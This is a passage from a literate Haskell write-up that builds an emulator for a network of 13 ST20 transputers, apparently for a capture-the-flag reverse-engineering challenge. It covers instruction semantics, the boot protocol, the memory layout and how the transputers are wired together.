<span id="cb27-7"><a href="#cb27-7" aria-hidden="true" tabindex="-1"></a>interpret (<span class="dt">Sec</span> <span class="dt">GCALL</span>) <span class="ot">=</span> xchg areg iptr</span>
<span id="cb27-8"><a href="#cb27-8" aria-hidden="true" tabindex="-1"></a>interpret (<span class="dt">Pri</span> <span class="dt">ADC</span> n) <span class="ot">=</span> areg <span class="op">+=</span> n</span>
<span id="cb27-9"><a href="#cb27-9" aria-hidden="true" tabindex="-1"></a>interpret (<span class="dt">Pri</span> <span class="dt">EQC</span> n) <span class="ot">=</span> areg <span class="op">%=</span> (\ a <span class="ot">-&gt;</span> fromBool <span class="op">$</span> a <span class="op">==</span> n)</span></code></pre></div>
<p>For some others, we can lift them into the host language and use Haskell
operations.</p>
<div class="sourceCode" id="cb28"><pre class="sourceCode haskell literate"><code class="sourceCode haskell"><span id="cb28-1"><a href="#cb28-1" aria-hidden="true" tabindex="-1"></a>interpret (<span class="dt">Sec</span> <span class="dt">PROD</span>) <span class="ot">=</span> liftOp (<span class="op">*</span>)</span>
<span id="cb28-2"><a href="#cb28-2" aria-hidden="true" tabindex="-1"></a>interpret (<span class="dt">Sec</span> <span class="dt">XOR</span>) <span class="ot">=</span> liftOp xor</span>
<span id="cb28-3"><a href="#cb28-3" aria-hidden="true" tabindex="-1"></a>interpret (<span class="dt">Sec</span> <span class="dt">AND</span>) <span class="ot">=</span> liftOp (<span class="op">.&amp;.</span>)</span>
<span id="cb28-4"><a href="#cb28-4" aria-hidden="true" tabindex="-1"></a>interpret (<span class="dt">Sec</span> <span class="dt">BSUB</span>) <span class="ot">=</span> liftOp (<span class="op">+</span>)</span>
<span id="cb28-5"><a href="#cb28-5" aria-hidden="true" tabindex="-1"></a>interpret (<span class="dt">Sec</span> <span class="dt">SSUB</span>) <span class="ot">=</span> liftOp <span class="op">$</span> \ a b <span class="ot">-&gt;</span> a <span class="op">+</span> <span class="dv">2</span> <span class="op">*</span> b</span>
<span id="cb28-6"><a href="#cb28-6" aria-hidden="true" tabindex="-1"></a>interpret (<span class="dt">Sec</span> <span class="dt">WSUB</span>) <span class="ot">=</span> liftOp (<span class="op">@@</span>)</span>
<span id="cb28-7"><a href="#cb28-7" aria-hidden="true" tabindex="-1"></a>interpret (<span class="dt">Sec</span> <span class="dt">GTx</span>) <span class="ot">=</span> liftOp <span class="op">$</span> \ a b <span class="ot">-&gt;</span> fromBool <span class="op">$</span> b <span class="op">&gt;</span> a</span>
<span id="cb28-8"><a href="#cb28-8" aria-hidden="true" tabindex="-1"></a>interpret (<span class="dt">Sec</span> <span class="dt">SHR</span>) <span class="ot">=</span> liftOp <span class="op">$</span> \ a b <span class="ot">-&gt;</span> b <span class="ot">`shiftR`</span> <span class="fu">fromIntegral</span> a</span>
<span id="cb28-9"><a href="#cb28-9" aria-hidden="true" tabindex="-1"></a>interpret (<span class="dt">Sec</span> <span class="dt">SHL</span>) <span class="ot">=</span> liftOp <span class="op">$</span> \ a b <span class="ot">-&gt;</span> b <span class="ot">`shiftL`</span> <span class="fu">fromIntegral</span> a</span>
<span id="cb28-10"><a href="#cb28-10" aria-hidden="true" tabindex="-1"></a>interpret (<span class="dt">Sec</span> <span class="dt">REM</span>) <span class="ot">=</span> liftOp <span class="op">$</span> \ a b <span class="ot">-&gt;</span> b <span class="ot">`mod`</span> a</span></code></pre></div>
<p>Others need a few operations to prepare the operands and access memory.</p>
<div class="sourceCode" id="cb29"><pre class="sourceCode haskell literate"><code class="sourceCode haskell"><span id="cb29-1"><a href="#cb29-1" aria-hidden="true" tabindex="-1"></a>interpret (<span class="dt">Sec</span> <span class="dt">SB</span>) <span class="ot">=</span> <span class="kw">do</span></span>
<span id="cb29-2"><a href="#cb29-2" aria-hidden="true" tabindex="-1"></a>    a <span class="ot">&lt;-</span> popInt</span>
<span id="cb29-3"><a href="#cb29-3" aria-hidden="true" tabindex="-1"></a>    b <span class="ot">&lt;-</span> popInt</span>
<span id="cb29-4"><a href="#cb29-4" aria-hidden="true" tabindex="-1"></a>    memByte a <span class="op">.=</span> <span class="fu">fromIntegral</span> b</span>
<span id="cb29-5"><a href="#cb29-5" aria-hidden="true" tabindex="-1"></a>interpret (<span class="dt">Sec</span> <span class="dt">DUP</span>) <span class="ot">=</span> <span class="kw">do</span></span>
<span id="cb29-6"><a href="#cb29-6" aria-hidden="true" tabindex="-1"></a>    a <span class="ot">&lt;-</span> popInt</span>
<span id="cb29-7"><a href="#cb29-7" aria-hidden="true" tabindex="-1"></a>    pushInt a</span>
<span id="cb29-8"><a href="#cb29-8" aria-hidden="true" tabindex="-1"></a>    pushInt a</span>
<span id="cb29-9"><a href="#cb29-9" aria-hidden="true" tabindex="-1"></a>interpret (<span class="dt">Pri</span> <span class="dt">STL</span> n) <span class="ot">=</span> <span class="kw">do</span></span>
<span id="cb29-10"><a href="#cb29-10" aria-hidden="true" tabindex="-1"></a>    v <span class="ot">&lt;-</span> popInt</span>
<span id="cb29-11"><a href="#cb29-11" aria-hidden="true" tabindex="-1"></a>    var n <span class="op">.=</span> v</span>
<span id="cb29-12"><a href="#cb29-12" aria-hidden="true" tabindex="-1"></a>interpret (<span class="dt">Pri</span> <span class="dt">LDLP</span> n) <span class="ot">=</span> <span class="kw">do</span></span>
<span id="cb29-13"><a href="#cb29-13" aria-hidden="true" tabindex="-1"></a>    v <span class="ot">&lt;-</span> use wptr</span>
<span id="cb29-14"><a href="#cb29-14" aria-hidden="true" tabindex="-1"></a>    pushInt <span class="op">$</span> v <span class="op">@@</span> n</span>
<span id="cb29-15"><a href="#cb29-15" aria-hidden="true" tabindex="-1"></a>interpret (<span class="dt">Pri</span> <span class="dt">LDL</span> n) <span class="ot">=</span> <span class="kw">do</span></span>
<span id="cb29-16"><a href="#cb29-16" aria-hidden="true" tabindex="-1"></a>    v <span class="ot">&lt;-</span> use <span class="op">$</span> var n</span>
<span id="cb29-17"><a href="#cb29-17" aria-hidden="true" tabindex="-1"></a>    pushInt v</span>
<span id="cb29-18"><a href="#cb29-18" aria-hidden="true" tabindex="-1"></a>interpret (<span class="dt">Sec</span> <span class="dt">LDPI</span>) <span class="ot">=</span> <span class="kw">do</span></span>
<span id="cb29-19"><a href="#cb29-19" aria-hidden="true" tabindex="-1"></a>    ip <span class="ot">&lt;-</span> use iptr</span>
<span id="cb29-20"><a href="#cb29-20" aria-hidden="true" tabindex="-1"></a>    areg <span class="op">+=</span> ip</span>
<span id="cb29-21"><a href="#cb29-21" aria-hidden="true" tabindex="-1"></a>interpret (<span class="dt">Pri</span> <span class="dt">CJ</span> n) <span class="ot">=</span> <span class="kw">do</span></span>
<span id="cb29-22"><a href="#cb29-22" aria-hidden="true" tabindex="-1"></a>    a <span class="ot">&lt;-</span> popInt</span>
<span id="cb29-23"><a href="#cb29-23" aria-hidden="true" tabindex="-1"></a>    <span class="kw">let</span> d <span class="ot">=</span> <span class="kw">if</span> a <span class="op">==</span> <span class="dv">0</span> <span class="kw">then</span> n <span class="kw">else</span> <span class="dv">0</span></span>
<span id="cb29-24"><a href="#cb29-24" aria-hidden="true" tabindex="-1"></a>    iptr <span class="op">+=</span> d</span>
<span id="cb29-25"><a href="#cb29-25" aria-hidden="true" tabindex="-1"></a>interpret (<span class="dt">Sec</span> <span class="dt">LB</span>) <span class="ot">=</span> <span class="kw">do</span></span>
<span id="cb29-26"><a href="#cb29-26" aria-hidden="true" tabindex="-1"></a>    a <span class="ot">&lt;-</span> use areg</span>
<span id="cb29-27"><a href="#cb29-27" aria-hidden="true" tabindex="-1"></a>    a&#39; <span class="ot">&lt;-</span> <span class="fu">fromIntegral</span> <span class="op">&lt;$&gt;</span> use (memByte a)</span>
<span id="cb29-28"><a href="#cb29-28" aria-hidden="true" tabindex="-1"></a>    areg <span class="op">.=</span> a&#39;</span>
<span id="cb29-29"><a href="#cb29-29" aria-hidden="true" tabindex="-1"></a>interpret (<span class="dt">Pri</span> <span class="dt">STNL</span> n) <span class="ot">=</span> <span class="kw">do</span></span>
<span id="cb29-30"><a href="#cb29-30" aria-hidden="true" tabindex="-1"></a>    a <span class="ot">&lt;-</span> popInt</span>
<span id="cb29-31"><a href="#cb29-31" aria-hidden="true" tabindex="-1"></a>    b <span class="ot">&lt;-</span> popInt</span>
<span id="cb29-32"><a href="#cb29-32" aria-hidden="true" tabindex="-1"></a>    memWord (a <span class="op">@@</span> n) <span class="op">.=</span> b</span>
<span id="cb29-33"><a href="#cb29-33" aria-hidden="true" tabindex="-1"></a>interpret (<span class="dt">Pri</span> <span class="dt">LDNL</span> n) <span class="ot">=</span> <span class="kw">do</span></span>
<span id="cb29-34"><a href="#cb29-34" aria-hidden="true" tabindex="-1"></a>    a <span class="ot">&lt;-</span> use areg</span>
<span id="cb29-35"><a href="#cb29-35" aria-hidden="true" tabindex="-1"></a>    a&#39; <span class="ot">&lt;-</span> use <span class="op">$</span> memWord <span class="op">$</span> a <span class="op">@@</span> n</span>
<span id="cb29-36"><a href="#cb29-36" aria-hidden="true" tabindex="-1"></a>    areg <span class="op">.=</span> a&#39;</span></code></pre></div>
<p>Call and return instructions use the workspace to pass arguments.</p>
<div class="sourceCode" id="cb30"><pre class="sourceCode haskell literate"><code class="sourceCode haskell"><span id="cb30-1"><a href="#cb30-1" aria-hidden="true" tabindex="-1"></a>interpret (<span class="dt">Pri</span> <span class="dt">CALL</span> n) <span class="ot">=</span> <span class="kw">do</span></span>
<span id="cb30-2"><a href="#cb30-2" aria-hidden="true" tabindex="-1"></a>    (a, b, c) <span class="ot">&lt;-</span> popAll</span>
<span id="cb30-3"><a href="#cb30-3" aria-hidden="true" tabindex="-1"></a>    pushWorkspace c</span>
<span id="cb30-4"><a href="#cb30-4" aria-hidden="true" tabindex="-1"></a>    pushWorkspace b</span>
<span id="cb30-5"><a href="#cb30-5" aria-hidden="true" tabindex="-1"></a>    pushWorkspace a</span>
<span id="cb30-6"><a href="#cb30-6" aria-hidden="true" tabindex="-1"></a>    ip <span class="ot">&lt;-</span> use iptr</span>
<span id="cb30-7"><a href="#cb30-7" aria-hidden="true" tabindex="-1"></a>    pushWorkspace ip</span>
<span id="cb30-8"><a href="#cb30-8" aria-hidden="true" tabindex="-1"></a>    areg <span class="op">.=</span> ip</span>
<span id="cb30-9"><a href="#cb30-9" aria-hidden="true" tabindex="-1"></a>    iptr <span class="op">+=</span> n</span>
<span id="cb30-10"><a href="#cb30-10" aria-hidden="true" tabindex="-1"></a>interpret (<span class="dt">Sec</span> <span class="dt">RET</span>) <span class="ot">=</span> <span class="kw">do</span></span>
<span id="cb30-11"><a href="#cb30-11" aria-hidden="true" tabindex="-1"></a>    newIp <span class="ot">&lt;-</span> popWorkspace</span>
<span id="cb30-12"><a href="#cb30-12" aria-hidden="true" tabindex="-1"></a>    _ <span class="ot">&lt;-</span> popWorkspace</span>
<span id="cb30-13"><a href="#cb30-13" aria-hidden="true" tabindex="-1"></a>    _ <span class="ot">&lt;-</span> popWorkspace</span>
<span id="cb30-14"><a href="#cb30-14" aria-hidden="true" tabindex="-1"></a>    _ <span class="ot">&lt;-</span> popWorkspace</span>
<span id="cb30-15"><a href="#cb30-15" aria-hidden="true" tabindex="-1"></a>    iptr <span class="op">.=</span> newIp</span></code></pre></div>
<p>To perform I/O, the calling transputer needs to supply three things in the int
stack:</p>
<ul>
<li>the number of bytes to transfer;</li>
<li>a pointer to a channel;</li>
<li>where to read or write the message.</li>
</ul>
<p>The channel itself is abstracted in the transputer’s channel maps. Most reads
succeed; however the first transputer’s channel 0 will read directly from a
file, so it will reach end of file at some time. We can detect that when an
empty list is read, and exit the process.</p>
<div class="sourceCode" id="cb31"><pre class="sourceCode haskell literate"><code class="sourceCode haskell"><span id="cb31-1"><a href="#cb31-1" aria-hidden="true" tabindex="-1"></a>interpret (<span class="dt">Sec</span> <span class="dt">OUT</span>) <span class="ot">=</span> <span class="kw">do</span></span>
<span id="cb31-2"><a href="#cb31-2" aria-hidden="true" tabindex="-1"></a>    (len, pChan, pMsg) <span class="ot">&lt;-</span> popAll</span>
<span id="cb31-3"><a href="#cb31-3" aria-hidden="true" tabindex="-1"></a>    message <span class="ot">&lt;-</span> use <span class="op">$</span> mem8s pMsg len</span>
<span id="cb31-4"><a href="#cb31-4" aria-hidden="true" tabindex="-1"></a>    chan <span class="ot">&lt;-</span> asks <span class="op">$</span> getOChan pChan</span>
<span id="cb31-5"><a href="#cb31-5" aria-hidden="true" tabindex="-1"></a>    writeToOChan chan message</span>
<span id="cb31-6"><a href="#cb31-6" aria-hidden="true" tabindex="-1"></a>interpret (<span class="dt">Sec</span> <span class="dt">IN</span>) <span class="ot">=</span> <span class="kw">do</span></span>
<span id="cb31-7"><a href="#cb31-7" aria-hidden="true" tabindex="-1"></a>    (len, pChan, pMsg) <span class="ot">&lt;-</span> popAll</span>
<span id="cb31-8"><a href="#cb31-8" aria-hidden="true" tabindex="-1"></a>    chan <span class="ot">&lt;-</span> asks <span class="op">$</span> getIChan pChan</span>
<span id="cb31-9"><a href="#cb31-9" aria-hidden="true" tabindex="-1"></a>    input <span class="ot">&lt;-</span> readFromIChan chan len</span>
<span id="cb31-10"><a href="#cb31-10" aria-hidden="true" tabindex="-1"></a>    when (<span class="fu">null</span> input) <span class="op">$</span> liftIO exitSuccess</span>
<span id="cb31-11"><a href="#cb31-11" aria-hidden="true" tabindex="-1"></a>    mem8s pMsg (<span class="fu">fromIntegral</span> <span class="op">$</span> <span class="fu">length</span> input) <span class="op">.=</span> input</span></code></pre></div>
<p>The core of the interpreter is then very simple:</p>
<div class="sourceCode" id="cb32"><pre class="sourceCode haskell literate"><code class="sourceCode haskell"><span id="cb32-1"><a href="#cb32-1" aria-hidden="true" tabindex="-1"></a><span class="ot">evalLoop ::</span> <span class="dt">Eval</span> ()</span>
<span id="cb32-2"><a href="#cb32-2" aria-hidden="true" tabindex="-1"></a>evalLoop <span class="ot">=</span> <span class="kw">do</span></span>
<span id="cb32-3"><a href="#cb32-3" aria-hidden="true" tabindex="-1"></a>    i <span class="ot">&lt;-</span> decodeInstr</span>
<span id="cb32-4"><a href="#cb32-4" aria-hidden="true" tabindex="-1"></a>    interpret i</span>
<span id="cb32-5"><a href="#cb32-5" aria-hidden="true" tabindex="-1"></a>    evalLoop</span></code></pre></div>
<h2 id="boot-from-link">Boot from link</h2>
<p>Several things are missing: the memory map, and how the system boots.</p>
<p>It turns out that the ST20 has a very simple boot protocol:</p>
<ul>
<li>read 1 byte from port 0, call it <code>n</code></li>
<li>read <code>n</code> bytes from port 0</li>
<li>store those at <code>memStart</code></li>
<li>set the workspace just after this memory chunk</li>
<li>jump to <code>memStart</code></li>
</ul>
<div class="sourceCode" id="cb33"><pre class="sourceCode haskell literate"><code class="sourceCode haskell"><span id="cb33-1"><a href="#cb33-1" aria-hidden="true" tabindex="-1"></a><span class="ot">bootSeq ::</span> <span class="dt">Eval</span> ()</span>
<span id="cb33-2"><a href="#cb33-2" aria-hidden="true" tabindex="-1"></a>bootSeq <span class="ot">=</span> <span class="kw">do</span></span>
<span id="cb33-3"><a href="#cb33-3" aria-hidden="true" tabindex="-1"></a>    chan <span class="ot">&lt;-</span> asks <span class="op">$</span> getIChan <span class="op">$</span> iPin <span class="dv">0</span></span>
<span id="cb33-4"><a href="#cb33-4" aria-hidden="true" tabindex="-1"></a>    len <span class="ot">&lt;-</span> <span class="fu">head</span> <span class="op">&lt;$&gt;</span> readFromIChan chan <span class="dv">1</span></span>
<span id="cb33-5"><a href="#cb33-5" aria-hidden="true" tabindex="-1"></a>    prog <span class="ot">&lt;-</span> readFromIChan chan <span class="op">$</span> <span class="fu">fromIntegral</span> len</span>
<span id="cb33-6"><a href="#cb33-6" aria-hidden="true" tabindex="-1"></a>    mem8s memStart (<span class="fu">fromIntegral</span> <span class="op">$</span> <span class="fu">length</span> prog) <span class="op">.=</span> prog</span>
<span id="cb33-7"><a href="#cb33-7" aria-hidden="true" tabindex="-1"></a>    wptr <span class="op">.=</span> memStart <span class="op">+</span> <span class="fu">fromIntegral</span> len</span></code></pre></div>
<p>There’s some flexibility on <code>memStart</code>, but this value works:</p>
<div class="sourceCode" id="cb34"><pre class="sourceCode haskell literate"><code class="sourceCode haskell"><span id="cb34-1"><a href="#cb34-1" aria-hidden="true" tabindex="-1"></a><span class="ot">memStart ::</span> <span class="dt">Address</span></span>
<span id="cb34-2"><a href="#cb34-2" aria-hidden="true" tabindex="-1"></a>memStart <span class="ot">=</span> <span class="bn">0x80000100</span></span></code></pre></div>
<p>Pin numbers, however, are mapped to fixed address:</p>
<div class="sourceCode" id="cb35"><pre class="sourceCode haskell literate"><code class="sourceCode haskell"><span id="cb35-1"><a href="#cb35-1" aria-hidden="true" tabindex="-1"></a><span class="ot">iPin ::</span> <span class="dt">Int32</span> <span class="ot">-&gt;</span> <span class="dt">Int32</span></span>
<span id="cb35-2"><a href="#cb35-2" aria-hidden="true" tabindex="-1"></a>iPin n <span class="ot">=</span> <span class="bn">0x80000010</span> <span class="op">@@</span> n</span>
<span id="cb35-3"><a href="#cb35-3" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb35-4"><a href="#cb35-4" aria-hidden="true" tabindex="-1"></a><span class="ot">oPin ::</span> <span class="dt">Int32</span> <span class="ot">-&gt;</span> <span class="dt">Int32</span></span>
<span id="cb35-5"><a href="#cb35-5" aria-hidden="true" tabindex="-1"></a>oPin n <span class="ot">=</span> <span class="bn">0x80000000</span> <span class="op">@@</span> n</span></code></pre></div>
<p>We decide to initialize the memory with zeroes:</p>
<div class="sourceCode" id="cb36"><pre class="sourceCode haskell literate"><code class="sourceCode haskell"><span id="cb36-1"><a href="#cb36-1" aria-hidden="true" tabindex="-1"></a><span class="ot">initialMem ::</span> <span class="dt">Mem</span></span>
<span id="cb36-2"><a href="#cb36-2" aria-hidden="true" tabindex="-1"></a>initialMem <span class="ot">=</span></span>
<span id="cb36-3"><a href="#cb36-3" aria-hidden="true" tabindex="-1"></a>    M.fromList <span class="op">$</span> <span class="fu">zip</span> [<span class="bn">0x80000000</span> <span class="op">..</span> memEnd] <span class="op">$</span> <span class="fu">repeat</span> <span class="dv">0</span></span>
<span id="cb36-4"><a href="#cb36-4" aria-hidden="true" tabindex="-1"></a>        <span class="kw">where</span></span>
<span id="cb36-5"><a href="#cb36-5" aria-hidden="true" tabindex="-1"></a>            memSize <span class="ot">=</span> <span class="bn">0x4000</span></span>
<span id="cb36-6"><a href="#cb36-6" aria-hidden="true" tabindex="-1"></a>            memEnd <span class="ot">=</span> memStart <span class="op">+</span> memSize <span class="op">-</span> <span class="dv">1</span></span></code></pre></div>
<p>Booting a transputer is then just a matter of reading from the correct channel
and doing the rest of the evaluation loop.</p>
<div class="sourceCode" id="cb37"><pre class="sourceCode haskell literate"><code class="sourceCode haskell"><span id="cb37-1"><a href="#cb37-1" aria-hidden="true" tabindex="-1"></a><span class="ot">transputer ::</span> <span class="dt">Maybe</span> <span class="dt">Analysis</span></span>
<span id="cb37-2"><a href="#cb37-2" aria-hidden="true" tabindex="-1"></a>           <span class="ot">-&gt;</span> [((<span class="dt">Int32</span>, <span class="dt">IChannel</span>), (<span class="dt">Int32</span>, <span class="dt">OChannel</span>))]</span>
<span id="cb37-3"><a href="#cb37-3" aria-hidden="true" tabindex="-1"></a>           <span class="ot">-&gt;</span> <span class="dt">IO</span> (<span class="dt">MVar</span> ())</span>
<span id="cb37-4"><a href="#cb37-4" aria-hidden="true" tabindex="-1"></a>transputer analysis cmap <span class="ot">=</span> <span class="kw">do</span></span>
<span id="cb37-5"><a href="#cb37-5" aria-hidden="true" tabindex="-1"></a>    <span class="kw">let</span> (imap, omap) <span class="ot">=</span> <span class="fu">unzip</span> cmap</span>
<span id="cb37-6"><a href="#cb37-6" aria-hidden="true" tabindex="-1"></a>    fork <span class="op">$</span> runEval initialMem imap omap <span class="op">$</span> <span class="kw">do</span></span>
<span id="cb37-7"><a href="#cb37-7" aria-hidden="true" tabindex="-1"></a>        bootSeq</span>
<span id="cb37-8"><a href="#cb37-8" aria-hidden="true" tabindex="-1"></a>        runAnalysis analysis</span>
<span id="cb37-9"><a href="#cb37-9" aria-hidden="true" tabindex="-1"></a>        evalLoop</span></code></pre></div>
<h2 id="multithreading-boilerplate">Multithreading boilerplate</h2>
<p>If you fork threads and don’t wait for them, nothing will happen since the main
thread will just exit. The solution is to create a “control” <code>MVar</code> that will be
signalled to by each thread:</p>
<div class="sourceCode" id="cb38"><pre class="sourceCode haskell literate"><code class="sourceCode haskell"><span id="cb38-1"><a href="#cb38-1" aria-hidden="true" tabindex="-1"></a><span class="ot">fork ::</span> <span class="dt">IO</span> () <span class="ot">-&gt;</span> <span class="dt">IO</span> (<span class="dt">MVar</span> ())</span>
<span id="cb38-2"><a href="#cb38-2" aria-hidden="true" tabindex="-1"></a>fork io <span class="ot">=</span> <span class="kw">do</span></span>
<span id="cb38-3"><a href="#cb38-3" aria-hidden="true" tabindex="-1"></a>    mvar <span class="ot">&lt;-</span> newEmptyMVar</span>
<span id="cb38-4"><a href="#cb38-4" aria-hidden="true" tabindex="-1"></a>    _ <span class="ot">&lt;-</span> forkFinally io <span class="op">$</span> \ _ <span class="ot">-&gt;</span> putMVar mvar ()</span>
<span id="cb38-5"><a href="#cb38-5" aria-hidden="true" tabindex="-1"></a>    <span class="fu">return</span> mvar</span></code></pre></div>
<p>And to wait for all of them:</p>
<div class="sourceCode" id="cb39"><pre class="sourceCode haskell literate"><code class="sourceCode haskell"><span id="cb39-1"><a href="#cb39-1" aria-hidden="true" tabindex="-1"></a><span class="ot">runAll ::</span> [<span class="dt">IO</span> (<span class="dt">MVar</span> ())] <span class="ot">-&gt;</span> <span class="dt">IO</span> ()</span>
<span id="cb39-2"><a href="#cb39-2" aria-hidden="true" tabindex="-1"></a>runAll ms <span class="ot">=</span> <span class="kw">do</span></span>
<span id="cb39-3"><a href="#cb39-3" aria-hidden="true" tabindex="-1"></a>    threads <span class="ot">&lt;-</span> <span class="fu">sequence</span> ms</span>
<span id="cb39-4"><a href="#cb39-4" aria-hidden="true" tabindex="-1"></a>    <span class="fu">mapM_</span> takeMVar threads</span></code></pre></div>
<h2 id="connecting-the-lines">Connecting the lines</h2>
<p>For this problem we have 13 transputers.</p>
<div class="sourceCode" id="cb40"><pre class="sourceCode haskell literate"><code class="sourceCode haskell"><span id="cb40-1"><a href="#cb40-1" aria-hidden="true" tabindex="-1"></a><span class="kw">data</span> <span class="dt">TransputerName</span> <span class="ot">=</span> <span class="dt">T00</span> <span class="op">|</span> <span class="dt">T01</span> <span class="op">|</span> <span class="dt">T02</span> <span class="op">|</span> <span class="dt">T03</span></span>
<span id="cb40-2"><a href="#cb40-2" aria-hidden="true" tabindex="-1"></a>                    <span class="op">|</span> <span class="dt">T04</span> <span class="op">|</span> <span class="dt">T05</span> <span class="op">|</span> <span class="dt">T06</span> <span class="op">|</span> <span class="dt">T07</span></span>
<span id="cb40-3"><a href="#cb40-3" aria-hidden="true" tabindex="-1"></a>                    <span class="op">|</span> <span class="dt">T08</span> <span class="op">|</span> <span class="dt">T09</span> <span class="op">|</span> <span class="dt">T10</span> <span class="op">|</span> <span class="dt">T11</span></span>
<span id="cb40-4"><a href="#cb40-4" aria-hidden="true" tabindex="-1"></a>                    <span class="op">|</span> <span class="dt">T12</span></span>
<span id="cb40-5"><a href="#cb40-5" aria-hidden="true" tabindex="-1"></a>  <span class="kw">deriving</span> (<span class="dt">Enum</span>, <span class="dt">Eq</span>)</span></code></pre></div>
<p>We devise a way to connect them together. The communication between two
transputers is bidirectional, so we need two channels. Each of them is converted
to an <code>OChannel</code> on one side and an <code>IChannel</code> on the other one.</p>
<div class="sourceCode" id="cb41"><pre class="sourceCode haskell literate"><code class="sourceCode haskell"><span id="cb41-1"><a href="#cb41-1" aria-hidden="true" tabindex="-1"></a><span class="ot">connect ::</span> <span class="dt">TransputerName</span> <span class="ot">-&gt;</span> <span class="dt">Int32</span></span>
<span id="cb41-2"><a href="#cb41-2" aria-hidden="true" tabindex="-1"></a>        <span class="ot">-&gt;</span> <span class="dt">TransputerName</span> <span class="ot">-&gt;</span> <span class="dt">Int32</span></span>
<span id="cb41-3"><a href="#cb41-3" aria-hidden="true" tabindex="-1"></a>        <span class="ot">-&gt;</span> <span class="dt">IO</span> [(<span class="dt">TransputerName</span>, <span class="dt">Int32</span>, <span class="dt">OChannel</span>, <span class="dt">IChannel</span>)]</span>
<span id="cb41-4"><a href="#cb41-4" aria-hidden="true" tabindex="-1"></a>connect src srcPort dst dstPort <span class="ot">=</span> <span class="kw">do</span></span>
<span id="cb41-5"><a href="#cb41-5" aria-hidden="true" tabindex="-1"></a>  x <span class="ot">&lt;-</span> newChan</span>
<span id="cb41-6"><a href="#cb41-6" aria-hidden="true" tabindex="-1"></a>  y <span class="ot">&lt;-</span> newChan</span>
<span id="cb41-7"><a href="#cb41-7" aria-hidden="true" tabindex="-1"></a>  <span class="fu">return</span> [ (src, srcPort, <span class="dt">OutChan</span> x, <span class="dt">InChan</span> y)</span>
<span id="cb41-8"><a href="#cb41-8" aria-hidden="true" tabindex="-1"></a>         , (dst, dstPort, <span class="dt">OutChan</span> y, <span class="dt">InChan</span> x)</span>
<span id="cb41-9"><a href="#cb41-9" aria-hidden="true" tabindex="-1"></a>         ]</span></code></pre></div>
<p>Booting them is a matter of creating the correct communication channels (this
pinout list comes from a schematic that was present in the challenge files).</p>
<div class="sourceCode" id="cb42"><pre class="sourceCode haskell literate"><code class="sourceCode haskell"><span id="cb42-1"><a href="#cb42-1" aria-hidden="true" tabindex="-1"></a><span class="ot">main ::</span> <span class="dt">IO</span> ()</span>
<span id="cb42-2"><a href="#cb42-2" aria-hidden="true" tabindex="-1"></a>main <span class="ot">=</span> <span class="kw">do</span></span>
<span id="cb42-3"><a href="#cb42-3" aria-hidden="true" tabindex="-1"></a>    pins <span class="ot">&lt;-</span> <span class="fu">concat</span> <span class="op">&lt;$&gt;</span> <span class="fu">sequence</span></span>
<span id="cb42-4"><a href="#cb42-4" aria-hidden="true" tabindex="-1"></a>        [ connect <span class="dt">T00</span> <span class="dv">1</span> <span class="dt">T01</span> <span class="dv">0</span></span>
<span id="cb42-5"><a href="#cb42-5" aria-hidden="true" tabindex="-1"></a>        , connect <span class="dt">T00</span> <span class="dv">2</span> <span class="dt">T02</span> <span class="dv">0</span></span>
<span id="cb42-6"><a href="#cb42-6" aria-hidden="true" tabindex="-1"></a>        , connect <span class="dt">T00</span> <span class="dv">3</span> <span class="dt">T03</span> <span class="dv">0</span></span>
<span id="cb42-7"><a href="#cb42-7" aria-hidden="true" tabindex="-1"></a>        , connect <span class="dt">T01</span> <span class="dv">1</span> <span class="dt">T04</span> <span class="dv">0</span></span>
<span id="cb42-8"><a href="#cb42-8" aria-hidden="true" tabindex="-1"></a>        , connect <span class="dt">T01</span> <span class="dv">2</span> <span class="dt">T05</span> <span class="dv">0</span></span>
<span id="cb42-9"><a href="#cb42-9" aria-hidden="true" tabindex="-1"></a>        , connect <span class="dt">T01</span> <span class="dv">3</span> <span class="dt">T06</span> <span class="dv">0</span></span>
<span id="cb42-10"><a href="#cb42-10" aria-hidden="true" tabindex="-1"></a>        , connect <span class="dt">T02</span> <span class="dv">1</span> <span class="dt">T07</span> <span class="dv">0</span></span>
<span id="cb42-11"><a href="#cb42-11" aria-hidden="true" tabindex="-1"></a>        , connect <span class="dt">T02</span> <span class="dv">2</span> <span class="dt">T08</span> <span class="dv">0</span></span>
<span id="cb42-12"><a href="#cb42-12" aria-hidden="true" tabindex="-1"></a>        , connect <span class="dt">T02</span> <span class="dv">3</span> <span class="dt">T09</span> <span class="dv">0</span></span>
<span id="cb42-13"><a href="#cb42-13" aria-hidden="true" tabindex="-1"></a>        , connect <span class="dt">T03</span> <span class="dv">1</span> <span class="dt">T10</span> <span class="dv">0</span></span>
<span id="cb42-14"><a href="#cb42-14" aria-hidden="true" tabindex="-1"></a>        , connect <span class="dt">T03</span> <span class="dv">2</span> <span class="dt">T11</span> <span class="dv">0</span></span>
<span id="cb42-15"><a href="#cb42-15" aria-hidden="true" tabindex="-1"></a>        , connect <span class="dt">T03</span> <span class="dv">3</span> <span class="dt">T12</span> <span class="dv">0</span></span>
<span id="cb42-16"><a href="#cb42-16" aria-hidden="true" tabindex="-1"></a>        , connect <span class="dt">T11</span> <span class="dv">1</span> <span class="dt">T12</span> <span class="dv">1</span></span>
<span id="cb42-17"><a href="#cb42-17" aria-hidden="true" tabindex="-1"></a>        ]</span>
<span id="cb42-18"><a href="#cb42-18" aria-hidden="true" tabindex="-1"></a>    runAll <span class="op">$</span> <span class="fu">map</span> (buildTransputer pins) [<span class="dt">T00</span> <span class="op">..</span>]</span>
<span id="cb42-19"><a href="#cb42-19" aria-hidden="true" tabindex="-1"></a>        <span class="kw">where</span></span>
<span id="cb42-20"><a href="#cb42-20" aria-hidden="true" tabindex="-1"></a>            buildTransputer pins t <span class="ot">=</span></span>
<span id="cb42-21"><a href="#cb42-21" aria-hidden="true" tabindex="-1"></a>                transputer (isDebug t) <span class="op">$</span> onlyFor t pins <span class="op">++</span> extraPins t</span>
<span id="cb42-22"><a href="#cb42-22" aria-hidden="true" tabindex="-1"></a>            pin n ochan ichan <span class="ot">=</span> ((iPin n, ichan), (oPin n, ochan))</span>
<span id="cb42-23"><a href="#cb42-23" aria-hidden="true" tabindex="-1"></a>            onlyFor src l <span class="ot">=</span> [pin p oc ic <span class="op">|</span> (name, p, oc, ic) <span class="ot">&lt;-</span> l, name <span class="op">==</span> src]</span>
